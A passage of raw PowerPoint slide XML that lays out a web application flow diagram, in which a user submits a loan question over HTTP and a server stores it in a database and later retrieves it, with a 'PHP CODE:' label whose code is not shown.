          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10239237" y="1798319"/>
            <a:ext cx="497840" cy="591820"/>
            <a:chOff x="7679428" y="1348739"/>
            <a:chExt cx="373380" cy="443865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="39" name="object 39"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7679428" y="1348739"/>
              <a:ext cx="373374" cy="443478"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="40" name="object 40"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7725854" y="1372057"/>
              <a:ext cx="277418" cy="348907"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="object 41"/>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42" name="object 42"/>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3" name="object 43"/>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44" name="object 44"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606571" y="4724570"/>
            <a:ext cx="1172355" cy="1542575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="object 45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7781417" y="5675999"/>
            <a:ext cx="3685540" cy="755762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="976182">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>stores</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="50799"/>
            <a:r>
              <a:rPr sz="3600" spc="-9" baseline="-27777" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="669" baseline="-27777" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>database.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="46" name="object 46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="2834199"/>
            <a:ext cx="2479040" cy="1144692"/>
            <a:chOff x="0" y="2125649"/>
            <a:chExt cx="1859280" cy="858519"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="47" name="object 47"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2131834"/>
              <a:ext cx="683015" cy="683677"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48" name="object 48"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="660175" y="2136076"/>
              <a:ext cx="1157359" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="object 49"/>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50" name="object 50"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId14" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="621791" y="2253995"/>
              <a:ext cx="1237487" cy="729983"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="object 51"/>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52" name="object 52"/>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53" name="object 53"/>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54" name="object 54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="849376" y="3076432"/>
            <a:ext cx="1609513" cy="451273"/>
            <a:chOff x="637031" y="2307323"/>
            <a:chExt cx="1207135" cy="338455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="55" name="object 55"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId15" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1377695" y="2307323"/>
              <a:ext cx="460247" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="object 56"/>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57" name="object 57"/>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58" name="object 58"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1584950" y="2438385"/>
              <a:ext cx="251459" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="59" name="object 59"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId16" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="637031" y="2534391"/>
              <a:ext cx="1207007" cy="111252"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="object 60"/>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61" name="object 61"/>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62" name="object 62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="992725" y="3141071"/>
            <a:ext cx="1460500" cy="220133"/>
            <a:chOff x="744543" y="2355803"/>
            <a:chExt cx="1095375" cy="165100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="63" name="object 63"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId17" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1379219" y="2369807"/>
              <a:ext cx="460235" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="object 64"/>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65" name="object 65"/>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66" name="object 66"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId18" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="744543" y="2355803"/>
              <a:ext cx="288010" cy="52552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="object 67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273725" y="3603749"/>
            <a:ext cx="1148080"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68" name="object 68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="837183" y="3387337"/>
            <a:ext cx="496147" cy="591820"/>
            <a:chOff x="627887" y="2540502"/>
            <a:chExt cx="372110" cy="443865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="69" name="object 69"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId19" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="627887" y="2540502"/>
              <a:ext cx="371855" cy="443476"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="70" name="object 70"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId20" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="673114" y="2563418"/>
              <a:ext cx="277416" cy="348907"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="object 71"/>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72" name="object 72"/>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73" name="object 73"/>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74" name="object 74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="367764" y="3050012"/>
            <a:ext cx="291253" cy="209973"/>
            <a:chOff x="275823" y="2287509"/>
            <a:chExt cx="218440" cy="157480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="75" name="object 75"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId21" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="275823" y="2287509"/>
              <a:ext cx="111252" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="76" name="object 76"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId22" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="317155" y="2295348"/>
              <a:ext cx="176944" cy="85037"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="object 77"/>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7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>User asks </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>via</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-53" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-520"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78" name="object 78"/>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solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(message:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“How</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> a loan?”)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="object 79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9685260"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80" name="object 80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63625" y="3662791"/>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81" name="object 81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4778587" y="2538306"/>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13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Associate </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7"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sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="object 82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6732049" y="3166500"/>
            <a:ext cx="153924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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>retrieves </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>all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13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DB</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="83" name="object 83"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="390144" y="1135888"/>
            <a:ext cx="8449733" cy="1044787"/>
            <a:chOff x="292608" y="851916"/>
            <a:chExt cx="6337300" cy="783590"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="84" name="object 84"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId23" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="292608" y="851916"/>
              <a:ext cx="6336791" cy="783335"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="85" name="object 85"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId24" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="337794" y="878078"/>
              <a:ext cx="6242373" cy="688949"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86" name="object 86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="337794" y="878078"/>
              <a:ext cx="6242685" cy="688975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6242684" h="688975">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6242380" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6242380" y="688949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="688949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="4A7EBB"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="object 87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833120" y="1331942"/>
            <a:ext cx="1227667" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1647"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-47" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>CODE:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="object 88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2060448" y="1331942"/>
            <a:ext cx="260773" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDF8E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1647"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
